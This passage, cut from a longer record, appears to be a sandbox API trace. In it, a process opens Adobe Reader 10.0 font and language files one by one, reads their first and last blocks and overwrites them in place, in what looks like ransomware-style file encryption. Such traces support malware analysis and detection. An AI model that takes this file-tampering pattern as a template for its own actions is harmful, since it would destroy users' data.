hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x7b9c [0086.721] WriteFile (in: hFile=0x1ec, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.722] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0086.722] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.722] CloseHandle (hObject=0x1ec) returned 1 [0086.722] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Bold.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-bold.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0086.731] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0086.731] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x175c4 [0086.731] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0086.731] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.731] ReleaseMutex (hMutex=0x168) returned 1 [0086.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadPro-Bold.otf", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0086.731] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadPro-Bold.otf", cchWideChar=18, lpMultiByteStr=0x1f88a64, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MyriadPro-Bold.otf", lpUsedDefaultChar=0x0) returned 18 [0086.731] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bb8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.757] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x165c4 [0086.757] ReadFile (in: hFile=0x1ec, lpBuffer=0x2696c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2696c18*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.813] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x165c4 [0086.814] WriteFile (in: hFile=0x1ec, lpBuffer=0x2695be8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695be8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.814] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0086.814] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.814] CloseHandle (hObject=0x1ec) returned 1 [0086.815] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0086.816] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0086.816] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x12735 [0086.816] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0086.816] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0086.816] ReleaseMutex (hMutex=0x168) returned 1 [0086.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZX______.PFB", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ZX______.PFB", cchWideChar=12, lpMultiByteStr=0x1f7366c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ZX______.PFB", lpUsedDefaultChar=0x0) returned 12 [0086.816] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0086.843] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x11735 [0086.843] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0086.906] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x11735 [0086.907] WriteFile (in: hFile=0x1ec, lpBuffer=0x2888e18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2888e18*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0086.907] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0086.907] WriteFile (in: hFile=0x1ec, lpBuffer=0x2692be8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692be8*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0086.907] CloseHandle (hObject=0x1ec) returned 1 [0086.913] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0087.268] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0087.268] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6c96 [0087.269] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0087.269] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0087.269] ReleaseMutex (hMutex=0x168) returned 1 [0087.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_IQ.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0087.269] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_IQ.txt", cchWideChar=30, lpMultiByteStr=0x1f8fedc, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_IQ.txt", lpUsedDefaultChar=0x0) returned 30 [0087.269] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0087.270] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5c96 [0087.270] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.254] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5c96 [0088.255] WriteFile (in: hFile=0x1ec, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.256] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0088.256] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.256] CloseHandle (hObject=0x1ec) returned 1 [0088.256] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0088.257] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0088.257] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6c96 [0088.257] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0088.257] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.258] ReleaseMutex (hMutex=0x168) returned 1 [0088.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_SA.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0088.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ar_SA.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ar_SA.txt", lpUsedDefaultChar=0x0) returned 30 [0088.258] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.292] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5c96 [0088.292] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.403] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5c96 [0088.404] WriteFile (in: hFile=0x1ec, lpBuffer=0x2664368*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2664368*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.405] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0088.405] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.405] CloseHandle (hObject=0x1ec) returned 1 [0088.422] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0088.423] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0088.423] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6cdc [0088.423] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0088.423] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.423] ReleaseMutex (hMutex=0x168) returned 1 [0088.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ca_ES.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0088.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.ca_ES.txt", cchWideChar=30, lpMultiByteStr=0x1f8fc3c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.ca_ES.txt", lpUsedDefaultChar=0x0) returned 30 [0088.424] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.689] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5cdc [0088.689] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0088.707] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5cdc [0088.708] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0088.708] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0088.709] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0088.709] CloseHandle (hObject=0x1ec) returned 1 [0089.051] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0090.208] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.208] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x7326 [0090.208] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.208] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.208] ReleaseMutex (hMutex=0x168) returned 1 [0090.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.de_DE_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0090.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.de_DE_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.de_DE_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0090.208] ReadFile (in: hFile=0x1f8, lpBuffer=0x2667c68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.276] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6326 [0090.298] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ea98e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea98e8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.330] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x6326 [0090.330] WriteFile (in: hFile=0x1f8, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.330] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0090.330] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.330] CloseHandle (hObject=0x1f8) returned 1 [0090.331] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US_POSIX.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us_posix.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0090.331] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.331] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6e88 [0090.331] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.331] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.331] ReleaseMutex (hMutex=0x168) returned 1 [0090.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_US_POSIX.txt", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0090.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.en_US_POSIX.txt", cchWideChar=36, lpMultiByteStr=0x1fa55f4, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.en_US_POSIX.txt", lpUsedDefaultChar=0x0) returned 36 [0090.332] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.333] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5e88 [0090.333] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.334] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x5e88 [0090.334] WriteFile (in: hFile=0x1f8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.334] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0090.334] WriteFile (in: hFile=0x1f8, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.334] CloseHandle (hObject=0x1f8) returned 1 [0090.335] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_EC.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ec.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0090.335] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.335] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6ec6 [0090.335] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0090.335] 